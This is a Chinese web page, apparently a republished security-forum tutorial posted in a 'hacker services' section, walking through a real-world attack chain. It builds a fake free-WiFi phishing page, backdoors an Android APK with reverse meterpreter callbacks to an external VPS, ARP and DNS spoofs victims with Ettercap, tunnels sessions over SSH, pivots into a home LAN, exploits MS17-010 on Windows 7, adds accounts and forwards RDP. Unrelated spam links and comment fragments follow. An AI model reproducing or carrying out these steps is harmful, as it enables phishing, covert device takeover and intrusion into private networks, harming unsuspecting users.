当前位置:首页 > 黑客服务 > 正文内容

kali密码攻击教程(kali2020密码)

hacker8个月前 (05-03)黑客服务57

  * 本文作者:求一份网络安全实习,本文中提及的工具和技术方法仅供安全教学用途,禁止非法使用

  以前经常看Freebuf,学到了不少东西,现在想给入门的同学提供一点微小的帮助。以前老是不知道如何在外网使用msf这个神器,自己查了查资料,总结了一点自己的认识。

  0. 环境:

  a) Kali 2.0 (咖啡厅:192.168.0.2/校园网:172.16.X.X)

  i. Metasploit-Framework

  ii. Ettercap(dns欺骗)

  iii. Backdoor-apk(apk后门)

  iv. Python -m SimpleHTTPServer 80 (轻量级HTTP服务器)

  v. SSH Tunnel (外网打洞)

  b) Vultr vps 一台(Ubuntu 14.04)(公网IP:45.77.xx.xx)

  echo GatewayPorts yes>>/etc/ssh/sshd_config

  c) Android (魅蓝E2 Flyme by Yunos )( 咖啡厅:192.168.0.3/家庭局域网:192.168.0.3)

  d) Win7 x64 sp1(ms17_010)(家庭局域网:192.168.0.5)

  示意图:

kali密码攻击教程(kali2020密码)

  

  

  1. 构造钓鱼页面

kali密码攻击教程(kali2020密码)

  a) 首先我们在电脑上登录CMCC-EDU

  b) 弹出一个页面

  c) 该页面会提示下载一个 免费上网1.pak .我们正好用它来制作后门

  d) 保存该页面到桌面, 将 免费上网.html 重命名为 index.html 并放到 免费上网_files 文件夹中,然后修改HTML:,

  替换页面所有apk地址为免费上网.apk,并添加<iframe src=”免费上网.apk”>

  e) python -m SimpleHTTPServer 80 #(在index.html所在文件夹直接启动HTTP服务)

  2. 使用backdoor-apk制作apk后门

  a) 现在我们

  git clone https://github.com/dana-at-cp/backdoor-apk.git

  b)

  cd backdoor-apk-master/backdoor-apk

  c) 将 免费上网1.apk 复制到此目录 并且重命名为 mfsw.apk

  d)

  ./backdoor-apk.sh mfsw.apk

  e) payload 选择 3

  f) lhost 填写 vps 的IP地址 45.77.XX.XX

  g) lport填写 99 (vultr 会封掉一部分端口,比如默认的4444)

  h) 然后进入 original/dist 复制mfsw.apk 到 免费上网_files 那个包含我们钓鱼文件的文件夹,改名为 免费上网.apk

  3. Ettercap 实现 DNS 欺骗

  a) 查看ifconfig

  b)

  gedit /etc/ettercap/etter.dns

  * A 192.168.0.2

  * PTR 192.168.0.2

  c) 开启ettercap-gui 选择wlan0

  d) 扫描hosts

  e) 选择欺骗 192.168.0.1 和 192.168.0.3 (Android)

  f) 开启Arpspoof

  g) 加载dns sproof 模块

  h) 手机上如图:

  i.

  ii.

  iii.

  4. msf 通过SSHtunnel 接收 反弹meterpreter 会话

  a) 下面我们切换kali连接到其他wifi,

  ifconfig 查看一下当前kali ip

  当前地址为 172.16.8.181 ,我们等下还是能接收到来自Android的会话

  b)

  vi sshTunnel

  c)

  #!/bin/bashif [ -n “$1” ]#判断参数$1是否为空then echo 0.0.0.0 $1”--<>--”45.77.xx.xx:$1ssh -C -g root@45.77.xx.xx -R $1:127.0.0.1:$1#这里是相同端口是因为,msf监听不到45.77.xx.xx:$1 会自动监听0.0.0.0:$1,刚好能正常接收会话elseecho 0.0.0.099”--<>--”45.77.xx.xx99

  ssh -C -g root@45.77.xx.xx -R 99:127.0.0.1:99#默认监听99端口 fi

  d) chmod +x sshTunnel

  e) ./sshTunnel #默认99端口,运行sshtunnel 来实现 vps:99 到 127.0.0.1:99的转发

  f) 其实这里已经有会话反弹过来了,只是本地msf监听没有开启

  g) 现在我们开启msf监听

  cd backdoor-apk/backdoor-apk/

  msfconsole -r backdoor-apk. rc

  h) 可以看到会话已经建立

  i) session #查看

  j) wakelock #保持唤醒防止掉线

  k) session -i 1 #切换到meterpreter

  l) 截个图录个音啥的都不是事,能中招的用户肯定会给权限的,毕竟不是所有人都是有安全意识

  m) ifconfig#查看Android的网段

  n) run autoroute -s 192.168.0.3 #添加自动路由background#返回msfconsole

  o) 现在msf已经获得192.168.0.0/24网段的权限

  但是我们还是有访问该网段的权限,扫描一手ms17_010

  p) 既然是有ms17_010那就好办了(为了方便以后控制,加上bind_tcp正向连接成功率会低一点,所以使用reverse_tcp)

  q) sshtunnel 打洞,45.77.xx.136:88->127.0.0.1:88

  r) 可以看到,msf自动监听了0.0.0.0:88,这就是转发到相同端口的好处

  s) 这里win7 x64会重启,然后获得会话,可以看到win7的会话也被vps转发回来了

  t) seesion -i 2 #选择Windows的会话,并开启远程桌面

  

  u) 输入shell,进行添加用户,这里也可以用 run getgui -e -u admin -p 123

  v) 下面我们可以使用

  protfwd add -l 1234 -r 192.168.0.5 -p 3389

  将win7的远程桌面转发到本地1234端口

  w) get it!

  

  大三狗,会写Python,懂点Web安全,想去给网络安全公司的大佬端茶倒水(求一份网络安全实习,谢谢)

  * 本文作者:求一份网络安全实习,本文属FreeBuf原创奖励计划,未经许可禁止转载

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/147386.html

分享给朋友:

“kali密码攻击教程(kali2020密码)” 的相关文章

约茶app约茶APP

最新约茶app都是哪些?整理了30本这篇文章主要介绍了约茶app,包括约茶app ios下载,下面小编整理了约茶app的图文教程,看看约茶app苹果版详细步骤吧! 觉得网上的一些答 据新快网2021年10月20日03:31:27的新闻报道,微博网友@R卜傲晴 爆料。 平安夜来临之际,事件,在网上...

贾秀东个人资料简介(简历及图片)

贾秀东人物概况 本页面提供了贾秀东个人资料简介(简历及图片),贾秀东是谁?贾秀东个人简介资料完整设计了网页求职找工作编辑个人简历作品所需要的贾秀东网站常用模板元素,不保证贾秀东人物数据真实,任何问题请联系管理员调整。 贾秀东图片 贾秀东个人资料简介 贾秀东,中国国际问题研究所特聘研究员。1...

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另 鸡鸭的肛门附近组织,布满大大小小的腺体,各类秽物与毒素都在这些腺体囤积;鸡鸭的肛门也有非常高密度的大肠杆菌,所以鸡鸭的屁股不是少吃的问题,而是不能吃.吃得少可能没觉出怎样,多了问题就显出来了.而且鸡鸭屁股的大肠杆菌会随着蛋生出来的时...

古文化常识(中国古代文化常识大全)

1.中国古代文化常识 文学常识? 四本书:《论语》、《中庸》、《孟子大学》 五经:《诗经》《礼记》《周易》《春秋》 乐府双壁:木兰诗孔雀东南飞 三个字:警告世界,说真话,说真话,唤醒世界,说同样的话 第二枪:第一枪很厉害,第二枪也很厉害 三官:石渠官、潼关官、新安官 三次告别:新婚、老...

硅料价格走势图 「今日硅价格553价格」

据了解,价格大概是在:8000元到12500元不等;电池片.三峡新材,破片上有电路图的和没有电路图的,最多达到99 点5价格,硅矿\石英的用途很广泛的,必需的电子材料,75#主流价格维持。 3303#如果12200-12400,多种有机硅下游材料出现大涨,市场现货充足。10月30日国内金属粉末现货价...

小麦价格的走势图 「2019小麦价格最新行情走势」

小麦价格走势行情分析,近期11月20日小麦价格走势,显示今年我国小麦产量略有增加。 5月,尽管近期北京市场面粉价格略有上升.2008年小麦最低收购价格水平,今年国家统计是增产,市场粮源供应格局偏紧/10年度芝加哥期货交易所,粮食企业手中 去那儿看看http。 河南小麦价格2010年12月21日走势参...

评论列表

竹祭酒废
8个月前 (05-03)

  4. msf 通过SSHtunnel 接收 反弹meterpreter 会话   a) 下面我们切换kali连接到其他wifi,  ifconfig 查看一下当前kali ip   当前地址

竹祭笙沉
8个月前 (05-03)

下载一个 免费上网1.pak .我们正好用它来制作后门  d) 保存该页面到桌面, 将 免费上网.html 重命名为 index.html 并放到 免费上网_files 文件夹中,然后修改HTML:,  替换页面所有apk地址为免费上网.apk

听弧里予
8个月前 (05-03)

0/24网段的权限  但是我们还是有访问该网段的权限,扫描一手ms17_010   p) 既然是有ms17_010那就好办了(为了方便以后控制,加上bind_tcp正向连接成功率会低一点,所以使用reverse_tc

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。